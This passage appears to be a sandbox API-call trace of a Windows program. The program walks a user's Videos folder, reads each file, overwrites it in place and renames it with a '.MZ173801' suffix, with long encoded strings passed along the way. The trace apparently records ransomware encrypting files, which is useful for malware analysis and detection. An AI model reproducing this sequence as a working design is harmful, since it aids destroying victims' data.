NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0118.717] GetCurrentThreadId () returned 0x1358 [0118.717] GetCurrentThreadId () returned 0x1358 [0118.717] GetCurrentThreadId () returned 0x1358 [0118.718] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.718] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0118.718] GetCurrentThreadId () returned 0x1358 [0118.718] GetCurrentThreadId () returned 0x1358 [0118.718] GetCurrentThreadId () returned 0x1358 [0118.718] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Axgfxe603muHSLYjsgC.swf" (normalized: "c:\\users\\fd1hvy\\videos\\axgfxe603muhslyjsgc.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0118.718] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0118.718] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0118.718] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x18fb8 [0118.718] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0118.718] ReadFile (in: hFile=0x3fc, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x18fb8, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f9b0*=0x18fb8, lpOverlapped=0x0) returned 1 [0118.720] CloseHandle (hObject=0x3fc) returned 1 [0118.721] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Axgfxe603muHSLYjsgC.swf" (normalized: "c:\\users\\fd1hvy\\videos\\axgfxe603muhslyjsgc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0118.723] WriteFile (in: hFile=0x3fc, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x18fb8, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f9bc*=0x18fb8, lpOverlapped=0x0) returned 1 [0118.725] CloseHandle (hObject=0x3fc) returned 1 [0118.728] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\Axgfxe603muHSLYjsgC.swf" (normalized: "c:\\users\\fd1hvy\\videos\\axgfxe603muhslyjsgc.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\Axgfxe603muHSLYjsgC.swf.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\axgfxe603muhslyjsgc.swf.mz173801")) returned 1 [0118.729] GetCurrentThreadId () returned 0x1358 [0118.729] GetCurrentThreadId () returned 0x1358 [0118.729] GetCurrentThreadId () returned 0x1358 [0118.729] GetCurrentThreadId () returned 0x1358 [0118.729] GetCurrentThreadId () returned 0x1358 [0118.729] GetCurrentThreadId () returned 0x1358 [0118.729] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0118.729] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0118.729] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0118.729] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9625550, ftCreationTime.dwHighDateTime=0x1d5ef27, ftLastAccessTime.dwLowDateTime=0xaed18b40, ftLastAccessTime.dwHighDateTime=0x1d5ef2e, ftLastWriteTime.dwLowDateTime=0xaed18b40, ftLastWriteTime.dwHighDateTime=0x1d5ef2e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="di1GF8YsdAcjrR-s", cAlternateFileName="DI1GF8~1")) returned 1 [0118.729] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5751c20, ftCreationTime.dwHighDateTime=0x1d5ed7f, ftLastAccessTime.dwLowDateTime=0xdcdbe680, ftLastAccessTime.dwHighDateTime=0x1d5eaa5, ftLastWriteTime.dwLowDateTime=0xdcdbe680, ftLastWriteTime.dwHighDateTime=0x1d5eaa5, nFileSizeHigh=0x0, nFileSizeLow=0x49e9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="nPzlQpS1Oj776IOfWV7.mp4", cAlternateFileName="NPZLQP~1.MP4")) returned 1 [0118.729] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0118.729] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0118.729] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\nPzlQpS1Oj776IOfWV7.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\npzlqps1oj776iofwv7.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5751c20, ftCreationTime.dwHighDateTime=0x1d5ed7f, ftLastAccessTime.dwLowDateTime=0xdcdbe680, ftLastAccessTime.dwHighDateTime=0x1d5eaa5, ftLastWriteTime.dwLowDateTime=0xdcdbe680, ftLastWriteTime.dwHighDateTime=0x1d5eaa5, nFileSizeHigh=0x0, nFileSizeLow=0x49e9)) returned 1 [0118.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0118.730] GetCurrentThreadId () returned 0x1358 [0118.730] GetCurrentThreadId () returned 0x1358 [0118.730] GetCurrentThreadId () returned 0x1358 [0118.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0118.730] GetCurrentThreadId () returned 0x1358 [0118.730] GetCurrentThreadId () returned 0x1358 [0118.730] GetCurrentThreadId () returned 0x1358 [0118.731] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\nPzlQpS1Oj776IOfWV7.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\npzlqps1oj776iofwv7.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0118.731] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0118.731] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0118.731] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x49e9 [0118.731] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0118.731] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x49e9, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x49e9, lpOverlapped=0x0) returned 1 [0118.732] CloseHandle (hObject=0x3fc) returned 1 [0118.732] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\nPzlQpS1Oj776IOfWV7.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\npzlqps1oj776iofwv7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0118.733] WriteFile (in: hFile=0x3fc, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x49e9, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f9bc*=0x49e9, lpOverlapped=0x0) returned 1 [0118.735] CloseHandle (hObject=0x3fc) returned 1 [0118.736] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\nPzlQpS1Oj776IOfWV7.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\npzlqps1oj776iofwv7.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\nPzlQpS1Oj776IOfWV7.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\npzlqps1oj776iofwv7.mp4.mz173801")) returned 1 [0118.737] GetCurrentThreadId () returned 0x1358 [0118.737] GetCurrentThreadId () returned 0x1358 [0118.737] GetCurrentThreadId () returned 0x1358 [0118.737] GetCurrentThreadId () returned 0x1358 [0118.737] GetCurrentThreadId () returned 0x1358 [0118.737] GetCurrentThreadId () returned 0x1358 [0118.737] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1c8920, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x6176ef20, ftLastAccessTime.dwHighDateTime=0x1d5efd3, ftLastWriteTime.dwLowDateTime=0x6176ef20, ftLastWriteTime.dwHighDateTime=0x1d5efd3, nFileSizeHigh=0x0, nFileSizeLow=0xaa6a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="OhqnbvOqqEhHEL-.swf", cAlternateFileName="OHQNBV~1.SWF")) returned 1 [0118.737] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0118.737] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0118.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\OhqnbvOqqEhHEL-.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ohqnbvoqqehhel-.swf"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1c8920, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x6176ef20, ftLastAccessTime.dwHighDateTime=0x1d5efd3, ftLastWriteTime.dwLowDateTime=0x6176ef20, ftLastWriteTime.dwHighDateTime=0x1d5efd3, nFileSizeHigh=0x0, nFileSizeLow=0xaa6a)) returned 1 [0119.243] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 